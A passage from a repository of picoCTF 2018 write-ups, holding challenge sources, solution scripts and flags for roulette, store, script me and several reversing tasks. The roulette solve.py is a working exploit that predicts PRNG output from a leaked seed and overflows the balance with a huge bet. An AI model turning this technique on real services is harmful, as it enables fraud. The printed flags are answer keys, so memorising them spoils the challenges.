(ROULETTE_SPINS+ROULETTE_SIZE); i++) {\n n = printf(\"%d\", (i%ROULETTE_SIZE)+1);\n if (((i%ROULETTE_SIZE)+1) == spin) {\n for (j = 0; j < n; j++) {\n\tprintf(\"\\b \\b\");\n }\n break;\n }\n usleep(s);\n for (j = 0; j < n; j++) {\n printf(\"\\b \\b\");\n }\n }\n for (int k = 0; k < ROULETTE_SIZE; k++) {\n n = printf(\"%d\", ((i+k)%ROULETTE_SIZE)+1);\n s = 1.1*s;\n usleep(s);\n for (j = 0; j < n; j++) {\n printf(\"\\b \\b\");\n }\n }\n printf(\"%ld\", spin);\n usleep(s);\n puts(\"\");\n puts(\"\");\n}\n\nvoid play_roulette(long choice, long bet) {\n \n printf(\"Spinning the Roulette for a chance to win $%lu!\\n\", 2*bet);\n long spin = (rand() % ROULETTE_SIZE)+1;\n\n spin_roulette(spin);\n \n if (spin == choice) {\n cash += 2*bet;\n puts(win_msgs[rand()%NUM_WIN_MSGS]);\n wins += 1;\n }\n else {\n puts(lose_msgs1[rand()%NUM_LOSE_MSGS]);\n puts(lose_msgs2[rand()%NUM_LOSE_MSGS]);\n }\n puts(\"\");\n}\n\nint main(int argc, char *argv[]) {\n setvbuf(stdout, NULL, _IONBF, 0);\n\n cash = get_rand();\n \n puts(\"Welcome to ONLINE ROULETTE!\");\n printf(\"Here, have $%ld to start on the house! You'll lose it all anyways >:)\\n\", cash);\n puts(\"\");\n \n long bet;\n long choice;\n while(cash > 0) {\n bet = get_bet();\n cash -= bet;\n choice = get_choice();\n puts(\"\");\n \n play_roulette(choice, bet);\n \n if (wins >= MAX_WINS) {\n\tprintf(\"Wow you won %lu times? Looks like its time for you cash you out.\\n\", wins);\n\tprintf(\"Congrats you made $%lu. See you next time!\\n\", cash);\n\texit(-1);\n }\n \n if(cash > ONE_BILLION) {\n\tprintf(\"*** Current Balance: $%lu ***\\n\", cash);\n\tif (wins >= HOTSTREAK) {\n\t puts(\"Wow, I can't believe you did it.. You deserve this flag!\");\n\t print_flag();\n\t exit(0);\n\t}\n\telse {\n\t puts(\"Wait a second... You're not even on a hotstreak! Get out of here cheater!\");\n\t exit(-1);\n\t}\n\t}\n }\n puts(\"Haha, lost all the money I gave you already? See ya later!\");\n return 0;\n}\n" }, { "path": "General Skills/roulette/solution/Makefile", "content": "all:\n\tgcc generate.c -o generate\nclean:\n\trm generate\n" }, { "path": "General Skills/roulette/solution/generate.c", "content": "// C program to generate random numbers \n#include \n#include \n\nint main(int argc, char *argv[]) {\n\tif (argc < 2) {\n\t\treturn -1;\n\t}\n\tsrand(atoi(argv[1])); \n\tfor (int i = 0; i < 8; i++) {\n\t\tlong k = (rand() % 36) + 1;\n\t\tif (i % 2 == 0){\n\t\t\tprintf(\"%ld \", k);\n\t\t}\n\t}\n\tputs(\"\");\n\treturn 0; \n} \n" }, { "path": "General Skills/roulette/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nl = log.progress('Status')\ns = remote('2018shell1.picoctf.com', 5731)\n\nl.status('Getting seed...')\nseed = re.findall(r'Current Balance: \\$(\\d{1,4})', s.recvuntil('> '))[0]\n\nl.status('Generating number sequence...')\np = process(['./generate', seed])\nseq = p.recv().strip().split(' ')\n\n\nfor i in range(3):\n\tl.status('Started Round ' + str(i + 1))\n\ts.sendline('1')\n\ts.recvuntil('> ')\n\ts.sendline(seq[i])\n\ts.recvuntil('> ')\n\t\nl.status('Starting exploit')\n\ns.sendline('3000000000')\ns.recvuntil('> ')\n\nwrong = 0\nif int(seq[3]) == 35:\n\twrong = int(seq[3]) - 1\nelse:\n\twrong = int(seq[3]) + 1\n\nl.status('Waiting for Flag...')\ns.sendline(str(wrong))\nflag = re.findall(r'(picoCTF\\{.+\\})', s.recvall(timeout=10))[0]\nl.success('Got Flag!')\nlog.success('Flag: ' + flag)\n" }, { "path": "General Skills/script me/README.md", "content": "# script me\nPoints: 500\n\n## Category\nGeneral Skills\n\n## Question\n>Can you understand the language and answer the questions to retrieve the flag? Connect to the service with `nc 2018shell1.picoctf.com 7866` \n\n### Hint\n>Maybe try writing a python script?\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\nSolved by: [@plusline](https://github.com/plusline)\n\n### Flag\n`picoCTF{5cr1pt1nG_l1k3_4_pRo_45ca3f85}`\n" }, { "path": "General Skills/script me/solution/solve.py", "content": "#!/usr/bin/python\n# Author: plusline (https://github.com/plusline)\n# Modified by: PlatyPew\n\nimport re\nfrom pwn import *\n\n\ndef solve(problem):\n problem = problem.split(' + ')\n\n num = []\n\n for one in problem:\n count = 0\n max_c = 0\n\n for i in range(len(one)):\n if one[i] == '(':\n count += 1\n elif one[i] == ')':\n count -= 1\n max_c = max(max_c, count)\n num = num + [max_c]\n\n def combine(str1, str2, num1, num2):\n if num1 < num2:\n return '(' + str1 + str2[1:]\n elif num1 > num2:\n return str1[0:-1] + str2 + ')'\n elif num1 == num2:\n return str1+str2\n\n ans = problem[0]\n num_total = num[0]\n for i in range(1, len(problem), 1):\n ans = combine(ans, problem[i], num_total, num[i])\n num_total = max(num_total, num[i])\n\n return ans\n\ndef main():\n s = remote('2018shell.picoctf.com', 7866)\n for i in range(14):\n s.recvline()\n\n problem = s.recvline().strip()\n log.info('QUESTION: {}'.format(problem))\n ans = solve(problem.split('=')[0].strip())\n log.info('ANSWER: {}'.format(ans))\n s.sendline(ans)\n print\n\n for qns in range(4):\n for i in range(4):\n s.recvline()\n problem = s.recvline().strip()\n log.info('QUESTION: {}'.format(problem))\n ans = solve(problem.split('=')[0].strip())\n log.info('ANSWER: {}'.format(ans))\n s.sendline(ans)\n print\n\n for i in range(3):\n s.recvline()\n flag = s.recvline().strip()\n log.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n\nif __name__ == '__main__':\n main()\n" }, { "path": "General Skills/ssh-keyz/README.md", "content": "# ssh-keyz\nPoints: 150\n\n## Category\nGeneral Skills\n\n## Question\n>As nice as it is to use our webshell, sometimes its helpful to connect directly to our machine. To do so, please add your own public key to ~/.ssh/authorized_keys, using the webshell. The flag is in the ssh banner which will be displayed when you login remotely with ssh to with your username.\n\n### Hint\n>key generation [tutorial](https://confluence.atlassian.com/bitbucketserver/creating-ssh-keys-776639788.html)\n>\n>We also have an expert demonstrator to help you along. [link](https://www.youtube.com/watch?v=3CN65ccfllU&list=PLJ_vkrXdcgH-lYlRV8O-kef2zWvoy79yP&index=4)\n\n## Solution\nAdd your public key to _~/.ssh/authorized_keys_. You can generate an RSA key by doing `ssh-keygen -t rsa`.\n\nPublic key by default stored at _~/.ssh/id_rsa.pub_.\n\nConnect to web shell by doing `ssh @2018shell1.picoctf.com`\n\n```\n$ ssh Platy@2018shell1.picoctf.com\nThe authenticity of host '2018shell1.picoctf.com (18.223.208.176)' can't be established.\nECDSA key fingerprint is SHA256:zCX5ip3tx1RMbsJBc70jEazd+gAFzlbC1Q2iDI8LA/k.\nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added '2018shell1.picoctf.com,18.223.208.176' (ECDSA) to the list of known hosts.\npicoCTF{who_n33ds_p4ssw0rds_38dj21}\n...\n...\n...\n```\n\n### Flag\n`picoCTF{who_n33ds_p4ssw0rds_38dj21}`\n" }, { "path": "General Skills/store/README.md", "content": "# store\nPoints: 400\n\n## Category\nGeneral Skills\n\n## Question\n>We started a little [store](files/store), can you buy the flag? [Source](files/source.c). Connect with `2018shell1.picoctf.com 53220`. \n\n### Hint\n>Two's compliment can do some weird things when numbers get really big!\n\n## Solution\nBased off the hint, we can assume it's probably an integer overflow. HOWEVER, just by doing _strings_\n\n```\n$ strings store | grep pico\nYOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}\n```\n\nDon't store the flag in the local binary next time.\n\n### Flag\n`picoCTF{numb3r3_4r3nt_s4f3_cbb7151f}`\n" }, { "path": "General Skills/store/files/source.c", "content": "#include \n#include \nint main()\n{\n int con;\n con = 0;\n int account_balance = 1100;\n while(con == 0){\n \n printf(\"Welcome to the Store App V1.0\\n\");\n printf(\"World's Most Secure Purchasing App\\n\");\n\n printf(\"\\n[1] Check Account Balance\\n\");\n printf(\"\\n[2] Buy Stuff\\n\");\n printf(\"\\n[3] Exit\\n\");\n int menu;\n printf(\"\\n Enter a menu selection\\n\");\n fflush(stdin);\n scanf(\"%d\", &menu);\n if(menu == 1){\n printf(\"\\n\\n\\n Balance: %d \\n\\n\\n\", account_balance);\n }\n else if(menu == 2){\n printf(\"Current Auctions\\n\");\n printf(\"[1] I Can't Believe its not a Flag!\\n\");\n printf(\"[2] Real Flag\\n\");\n int auction_choice;\n fflush(stdin);\n scanf(\"%d\", &auction_choice);\n if(auction_choice == 1){\n printf(\"Imitation Flags cost 1000 each, how many would you like?\\n\");\n \n int number_flags = 0;\n fflush(stdin);\n scanf(\"%d\", &number_flags);\n if(number_flags > 0){\n int total_cost = 0;\n total_cost = 1000*number_flags;\n printf(\"\\nYour total cost is: %d\\n\", total_cost);\n if(total_cost <= account_balance){\n account_balance = account_balance - total_cost;\n printf(\"\\nYour new balance: %d\\n\\n\", account_balance);\n }\n else{\n printf(\"Not enough funds\\n\");\n }\n \n \n }\n \n \n \n \n }\n else if(auction_choice == 2){\n printf(\"A genuine Flag costs 100000 dollars, and we only have 1 in stock\\n\");\n printf(\"Enter 1 to purchase\");\n int bid = 0;\n fflush(stdin);\n scanf(\"%d\", &bid);\n \n if(bid == 1){\n \n if(account_balance > 100000){\n printf(\"YOUR FLAG IS:\\n\");\n }\n \n else{\n printf(\"\\nNot enough funds for transaction\\n\\n\\n\");\n }}\n\n }\n }\n else{\n con = 1;\n }\n\n }\n return 0;\n}\n" }, { "path": "General Skills/strings/README.md", "content": "# strings\nPoints: 100\n\n## Category\nGeneral Skills\n\n## Question\n>Can you find the flag in this [file]() without actually running it? You can also find the file in /problems/strings_2_b7404a3aee308619cb2ba79677989960 on the shell server. \n\n### Hint\n>[strings](https://linux.die.net/man/1/strings)\n\n## Solution\nWe are given a file with non-printable characters.\n\nThe _strings_ command prints all human-readable characters.\n\nWe can use the _strings_ command and _grep_ the flag.\n\nDo `strings strings | grep pico` to get flag.\n\n### Flag\n`picoCTF{sTrIngS_sAVeS_Time_3f712a28}`\n" }, { "path": "General Skills/what base is this?/README.md", "content": "# what base is this?\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>To be successful on your mission, you must be able read data represented in different ways, such as hexadecimal or binary. Can you get the flag from this program to prove you are ready? Connect with `nc 2018shell1.picoctf.com 1225`. \n\n### Hint\n>I hear python is a good means (among many) to convert things.\n>\n>It might help to have multiple windows open\n\n## Solution\nConvert to ASCII for the respective bases. Python or online tools can be used to help convert.\n\n1. Convert from binary\n2. Convert from hex\n3. Convert from octal\n\nWorking solution [solve.py](solution/solve.py).\n\n### Flag\n`picoCTF{delusions_about_finding_values_451a9a74}`\n" }, { "path": "General Skills/what base is this?/solution/solve.py", "content": "#!/usr/bin/python\n\nfrom pwn import *\nimport re\n\ns = remote('2018shell1.picoctf.com', 1225)\n\nbinary = s.recvuntil('word.')\nprint binary\n\nbinary = re.findall(r'(\\d+)', binary)\n\nans = ''\nfor i in binary:\n\tans += chr(int(i, 2))\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\nhexa = s.recvuntil('word').strip()\nprint hexa\n\nhexa = re.findall(r'([0-9a-f]+) as ', hexa)[0]\nans = hexa.decode('hex')\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\noctal = s.recvuntil('word.')[2:]\nprint octal\n\noctal = re.findall(r'[0-9]+', octal)\n\nans = ''\nfor i in octal:\n\tans += chr(int(i, 8))\n\nprint 'SEND> ' + ans\ns.sendline(ans)\n\nprint s.recvuntil('}\\n')\n\ns.close()" }, { "path": "General Skills/you can't see me/README.md", "content": "# you can't see me\nPoints: 200\n\n## Category\nGeneral Skills\n\n## Question\n>'...reading transmission... Y.O.U. .C.A.N.'.T. .S.E.E. .M.E. ...transmission ended...' Maybe something lies in /problems/you-can-t-see-me_3_1a39ec6c80b3f3a18610074f68acfe69. \n\n### Hint\n>What command can see/read files?\n>\n>What's in the manual page of ls?\n\n## Solution\nDoing `ls -la`, you can see the file with the period character as its name. As this character has special meaning when it comes to the linux file systems, when you try to _cat_ it normally, you get the error saying that the period character is a directory.\n\nTherefore you, can try using the _cat_ command by listing all files using the _*_ special character.\n\nDo `cat .*` to get the flag.\n\n### Flag\n`picoCTF{j0hn_c3na_paparapaaaaaaa_paparapaaaaaa_cf5156ef}`\n" }, { "path": "README.md", "content": "# picoCTF 2018 Writeup\nThis CTF was done with [@pauxy](https://github.com/pauxy) and [@StopDuckRoll](https://github.com/StopDuckRoll)\n\nSpecial thanks to [@LFlare](https://github.com/LFlare) for helping out with a few challenges!\n\n### Forensics writeups\nAlthough it states that I may do some of the writeups for the forensics challenges, it's very unlikely it will ever be completed, mostly because those challenges were not solved by me, and I'm lazy. Pull requests are welcomed!\n\n# Content Page\n- [Binary Exploitation](#binary-exploitation)\n- [Cryptography](#cryptography)\n- [Forensics](#forensics)\n- [General Skills](#general-skills)\n- [Reversing](#reversing)\n- [Web Exploitation](#web-exploitation)\n\n## Binary Exploitation\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
buffer overflow 0150Solved
buffer overflow 1200Solved
leak-me200Solved
shellcode200Solved
buffer overflow 2250Solved
got-2-learn-libc250Solved
echooo300Solved
authenticate350Solved
got-shell?350Solved
rop chain350Solved
buffer overflow 3450Unsolved
echo back500Unsolved
are you root?550Unsolved
gps550Unsolved
can-you-gets-me650Solved
\n\n## Cryptography\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
Crypto Warmup 175Solved
Crypto Warmup 275Solved
HEEEEEEERE'S Johnny!100Solved
caesar cipher 1150Solved
hertz150Solved
blaise's cipher200Solved
hertz 2200Solved
Safe RSA250Solved
caesar cipher 2250Solved
rsa-madlibs250Solved
SpyFi300Unsolved
Super Safe RSA350Solved
Super Safe RSA 2425Solved
Magic Padding Oracle450Unsolved
Super Safe RSA 3600Solved
James Brahm Returns700Unsolved
\n\n## Forensics\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
Forensics Warmup 150Solved
Forensics Warmup 250Solved
Desrouleaux150Solved
Reading Between the Eyes150Solved
Recovering From the Snap150Solved
admin panel150Solved
hex editor150Solved
Truly an Artist200Solved
now you don't200Solved
Ext Super Magic250Unsolved
Lying Out250Solved
What's My Name?250Solved
core350Unsolved
Malware Shops400Unsolved
LoadSomeBits550Solved
\n\n## General Skills\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
General Skills 150Solved
General Skills 250Solved
General Skills 350Solved
Resources50Solved
grep 175Solved
net cat75Solved
strings100Solved
pipe110Solved
grep 2125Solved
Aca-Shell-A150Solved
environ150Solved
ssh-keyz150Solved
what base is this?200Solved
you can't see me200Solved
absolutely relative200Solved
in out error275Solved
learn gdb300Solved
roulette350Solved
store400Solved
script me500Solved (@plusline)
Dog or Frog900Unsolved
\n\n## Reversing\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
Reversing Warmup 150Solved
Reversing Warmup 250Solved
assembly-0150Solved
assembly-1200Solved
be-quick-or-be-dead-1200Solved
quackme200Solved
assembly-2250Solved
be-quick-or-be-dead-2275Solved
be-quick-or-be-dead-3350Solved
quackme up350Unsolved
Radix's Terminal400Solved
assembly-3400Solved
keygen-me-1400Unsolved
assembly-4550Solved
special-pw600Unsolved
\n\n## Web Exploitation\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
ChallengesPointsStatus
Inspect Me125Solved
Client Side is Still Bad150Solved
Logon150Solved
Irish Name Repo200Solved
Mr. Robots200Solved
No Login200Solved
Secret Agent200Solved
Buttons250Solved
The Vault250Solved
Artisinal Handcrafted HTTP 3300Solved
Flaskcards350Solved
fancy-alive-monitoring400Solved
Secure Logon500Unsolved
Flaskcards Skeleton Key600Unsolved
Help Me Reset 2600Solved
A Simple Question650Solved
LambDash 3800Unsolved
\n" }, { "path": "Reversing/Radix's Terminal/README.md", "content": "# Radix's Terminal \nPoints: 400\n\n## Category\nReversing\n\n## Question\n>Can you find the password to Radix's login? You can also find the executable in /problems/radix-s-terminal_0_b6b476e9952f39511155a2e64fb75248?\n\n### Hint\n>https://en.wikipedia.org/wiki/Base64\n\n## Solution\nBased off the hint, we can assume the flag is being encoded in base64 just by doing _strings_\n\n```\ncGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9\nPlease provide a password!\nCongrats, now where's my flag?\nIncorrect Password!\n;*2$\"\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\nGCC: (Ubuntu 5.4.0-6ubuntu1~16.04.10) 5.4.0 20160609\n\n```\nputting the string cGljb0NURntiQXNFXzY0X2VOQ29EaU5nX2lTX0VBc1lfNDE3OTk0NTF9 in a base 64 decode will return us the flag\n\n\n### Flag\n`picoCTF{bAsE_64_eNCoDiNg_iS_EAsY_41799451}`\n" }, { "path": "Reversing/Reversing Warmup 1/README.md", "content": "# Reversing Warmup 1\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Throughout your journey you will have to run many programs. Can you navigate to /problems/reversing-warmup-1_1_b416a2d0694c871d8728d8268d84ac5c on the shell server and run this [program](files/run) to retreive the flag? \n\n### Hint\n>If you are searching online, it might be worth finding how to exeucte a program in command line.\n\n## Solution\nDownload the file and make it executable if needed to `chmod +x run`\n\nRun the file by doing `./run`\n\n### Flag\n`picoCTF{welc0m3_t0_r3VeRs1nG}`\n" }, { "path": "Reversing/Reversing Warmup 2/README.md", "content": "# Reversing Warmup 2\nPoints: 50\n\n## Category\nReversing\n\n## Question\n>Can you decode the following string `dGg0dF93NHNfczFtcEwz` from base64 format to ASCII? \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{hello}' as the flag.\n\n## Solution\n```python\n>>> print 'dGg0dF93NHNfczFtcEwz'.decode('base64')\nth4t_w4s_s1mpL3\n```\n\n### Flag\n`picoCTF{th4t_w4s_s1mpL3}`\n" }, { "path": "Reversing/assembly-0/README.md", "content": "# assembly-0\nPoints: 150\n\n## Category\nReversing\n\n## Question\n>What does asm0(0xc9,0xb0) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/intro_asm_rev.S) located in the directory at /problems/assembly-0_4_0f197369bfc00a9211504cf65ac31994. \n\n### Hint\n>basical assembly [tutorial](https://www.tutorialspoint.com/assembly_programming/assembly_basic_syntax.htm)\n>\n>assembly [registers](https://www.tutorialspoint.com/assembly_programming/assembly_registers.htm)\n\n## Solution\nIn assembly, the return value is always _eax_\n\n```asm\nasm0:\n\tpush\tebp\n\tmov\tebp,esp\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tmov\tebx,DWORD PTR [ebp+0xc]\n\tmov\teax,ebx\n\tmov\tesp,ebp\n\tpop\tebp\t\n\tret\n```\n\n_eax_ has value _0xc9_ and _ebx_ has value _0xb0_. As the value of _eax_ is replaced with _ebx_ when `mov eax,ebx` is executed, the returned value is _0xb0_.\n\n### Flag\n`0xb0`\n" }, { "path": "Reversing/assembly-0/files/intro_asm_rev.S", "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm0\n\nasm0:\n\tpush\tebp\n\tmov\tebp,esp\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tmov\tebx,DWORD PTR [ebp+0xc]\n\tmov\teax,ebx\n\tmov\tesp,ebp\n\tpop\tebp\t\n\tret\n" }, { "path": "Reversing/assembly-1/README.md", "content": "# assembly-1\nPoints: 200\n\n## Category\nReversing\n\n## Question\n>What does asm1(0x76) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/eq_asm_rev.S) located in the directory at /problems/assembly-1_0_cfb59ef3b257335ee403035a6e42c2ed. \n\n### Hint\n>assembly [conditions](https://www.tutorialspoint.com/assembly_programming/assembly_conditions.htm)\n\n## Solution\nThe value takes _0x76_ and subtracts and adds _0x3_ until _0x73_ is left\n\n### Flag\n`0x73`\n" }, { "path": "Reversing/assembly-1/files/eq_asm_rev.S", "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm1\n\nasm1:\n\tpush\tebp\n\tmov\tebp,esp\n\tcmp\tDWORD PTR [ebp+0x8],0x98\n\tjg \tpart_a\t\n\tcmp\tDWORD PTR [ebp+0x8],0x8\n\tjne\tpart_b\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tadd\teax,0x3\n\tjmp\tpart_d\npart_a:\n\tcmp\tDWORD PTR [ebp+0x8],0x16\n\tjne\tpart_c\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\npart_b:\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\n\tcmp\tDWORD PTR [ebp+0x8],0xbc\n\tjne\tpart_c\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tsub\teax,0x3\n\tjmp\tpart_d\npart_c:\n\tmov\teax,DWORD PTR [ebp+0x8]\n\tadd\teax,0x3\npart_d:\n\tpop\tebp\n\tret\n" }, { "path": "Reversing/assembly-2/README.md", "content": "# assembly-2\nPoints: 250\n\n## Category\nReversing\n\n## Question\n>What does asm2(0x7,0x28) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/loop_asm_rev.S) located in the directory at /problems/assembly-2_4_f8bfecf223768f4cac035751390ea590. \n\n### Hint\n>assembly [conditions](https://www.tutorialspoint.com/assembly_programming/assembly_conditions.htm)\n\n## Solution\nCompile the asm together with another function that calls the _asm2_ function and prints it out\n\n```asm\n[0x000011f4]> pdf\n/ (fcn) loc.asm2 44\n| loc.asm2 (int arg_8h, int arg_ch);\n| ; var int local_8h @ ebp-0x8\n| ; var int local_4h @ ebp-0x4\n| ; arg int arg_8h @ ebp+0x8\n| ; arg int arg_ch @ ebp+0xc\n| ; CALL XREF from sym.main (0x11ca)\n| 0x000011f4 55 push ebp\n| 0x000011f5 89e5 mov ebp, esp\n| 0x000011f7 83ec10 sub esp, 0x10\n| 0x000011fa 8b450c mov eax, dword [arg_ch] ; [0xc:4]=0\n| 0x000011fd 8945fc mov dword [local_4h], eax\n| 0x00001200 8b4508 mov eax, dword [arg_8h] ; [0x8:4]=0\n| 0x00001203 8945f8 mov dword [local_8h], eax\n| ,=< 0x00001206 eb08 jmp loc.part_b\n| | ;-- part_a:\n| .--> 0x00001208 8345fc01 add dword [local_4h], 1\n| :| 0x0000120c 83450876 add dword [arg_8h], 0x76 ; 'v'\n| :| ;-- part_b:\n| :| ; CODE XREF from loc.asm2 (0x1206)\n| :`-> 0x00001210 817d08dea100. cmp dword [arg_8h], 0xa1de ; [0xa1de:4]=-1\n| `==< 0x00001217 7eef jle loc.part_a\n| 0x00001219 8b45fc mov eax, dword [local_4h]\n| 0x0000121c 89ec mov esp, ebp\n| 0x0000121e 5d pop ebp\n\\ 0x0000121f c3 ret\n```\n\n```\n$ make all\ngcc -m32 -c loop.s -o loop.o\ngcc -m32 -c solve.c -o solve.o\nsolve.c: In function ‘main’:\nsolve.c:4:28: warning: implicit declaration of function ‘asm2’ [-Wimplicit-function-declaration]\n printf(\"Flag: 0x%x\\n\", asm2(0x7, 0x28));\n ^~~~\ngcc -m32 -o a.out solve.o loop.o\n./a.out\nFlag: 0x188\n```\n\nWorking solution [solve.sh](solution/solve.sh)\n\nThanks to [@LFlare](https://github.com/LFlare) for basically solving this.\n\n### Flag\n`0x188`\n" }, { "path": "Reversing/assembly-2/files/loop_asm_rev.S", "content": ".intel_syntax noprefix\n.bits 32\n\t\n.global asm2\n\nasm2:\n\tpush \tebp\n\tmov \tebp,esp\n\tsub \tesp,0x10\n\tmov \teax,DWORD PTR [ebp+0xc]\n\tmov \tDWORD PTR [ebp-0x4],eax\n\tmov \teax,DWORD PTR [ebp+0x8]\n\tmov\tDWORD PTR [ebp-0x8],eax\n\tjmp \tpart_b\npart_a:\t\n\tadd \tDWORD PTR [ebp-0x4],0x1\n\tadd\tDWORD PTR [ebp+0x8],0x76\npart_b:\t\n\tcmp \tDWORD PTR [ebp+0x8],0xa1de\n\tjle \tpart_a\n\tmov \teax,DWORD PTR [ebp-0x4]\n\tmov\tesp,ebp\n\tpop\tebp\n\tret\n" }, { "path": "Reversing/assembly-2/solution/Makefile", "content": "all:\n\tgcc -m32 -c loop.s -o loop.o\n\tgcc -m32 -c solve.c -o solve.o\n\tgcc -m32 -o a.out solve.o loop.o\n\t./a.out\nclean:\n\trm a.out *.o\n" }, { "path": "Reversing/assembly-2/solution/loop.s", "content": ".intel_syntax noprefix\n\t\n.global asm2\n\nasm2:\n\tpush \tebp\n\tmov \tebp,esp\n\tsub \tesp,0x10\n\tmov \teax,DWORD PTR [ebp+0xc]\n\tmov \tDWORD PTR [ebp-0x4],eax\n\tmov \teax,DWORD PTR [ebp+0x8]\n\tmov\tDWORD PTR [ebp-0x8],eax\n\tjmp \tpart_b\npart_a:\t\n\tadd \tDWORD PTR [ebp-0x4],0x1\n\tadd\tDWORD PTR [ebp+0x8],0x76\npart_b:\t\n\tcmp \tDWORD PTR [ebp+0x8],0xa1de\n\tjle \tpart_a\n\tmov \teax,DWORD PTR [ebp-0x4]\n\tmov\tesp,ebp\n\tpop\tebp\n\tret\n" }, { "path": "Reversing/assembly-2/solution/solve.c", "content": "#include \n\nint main() {\n printf(\"Flag: 0x%x\\n\", asm2(0x7, 0x28));\n}\n" }, { "path": "Reversing/assembly-2/solution/solve.sh", "content": "#!/bin/sh\nmake all\n" }, { "path": "Reversing/assembly-3/README.md", "content": "# assembly-3\nPoints: 400\n\n## Category\nReversing\n\n## Question\n>What does asm3(0xbda42100,0xb98dd6a5,0xecded223) return? Submit the flag as a hexadecimal value (starting with '0x'). NOTE: Your submission for this question will NOT be in the normal flag format. [Source](files/end_asm_rev.S) located in the directory at /problems/assembly-3_4_05ce5be4420bf9bd2ff37caf87e32898. \n\n### Hint\n>more(?) [registers](https://wiki.skullsecurity.org/index.php?title=Registers)\n\n## Solution\nCompile the asm together with another function that calls the _asm3_ function and prints it out\n\n```asm\n/ (fcn) loc.asm3 31\n| loc.asm3 (int arg_9h, int arg_ch, int arg_dh, int arg_10h);\n| ; arg int arg_9h @ ebp+0x9\n| ; arg int arg_ch @ ebp+0xc\n| ; arg int arg_dh @ ebp+0xd\n| ; arg int arg_10h @ ebp+0x10\n| ; CALL XREF from sym.main (0x11d5)\n| 0x000011ff 55 push ebp\n| 0x00001200 89e5 mov ebp, esp\n| 0x00001202 b8bc000000 mov eax, 0xbc\n| 0x00001207 30c0 xor al, al\n| 0x00001209 8a6509 mov ah, byte [arg_9h] ; [0x9:1]=0\n| 0x0000120c 66c1e010 shl ax, 0x10\n| 0x00001210 2a450c sub al, byte [arg_ch]\n| 0x00001213 02650d add ah, byte [arg_dh]\n| 0x00001216 66334510 xor ax, word [arg_10h]\n| 0x0000121a 89ec mov esp, ebp\n| 0x0000121c 5d pop ebp\n\\ 0x0000121d c3 ret\n\n```\n\n```\n$ make all\ngcc -m32 -c end.s -o end.o\ngcc -m32 -c solve.c -o solve.o\nsolve.c: In function ‘main’:\nsolve.c:4:28: warning: implicit declaration of function ‘asm3’ [-Wimplicit-function-declaration]\n printf(\"Flag: 0x%x\\n\", asm3(0xbda42100, 0xb98dd6a5, 0xecded223));\n ^~~~\ngcc -m32 -o a.out solve.o end.o\n./a.out\nFlag: 0x478\n```\n\n### Flag\n`0x478`\n" }, { "path": 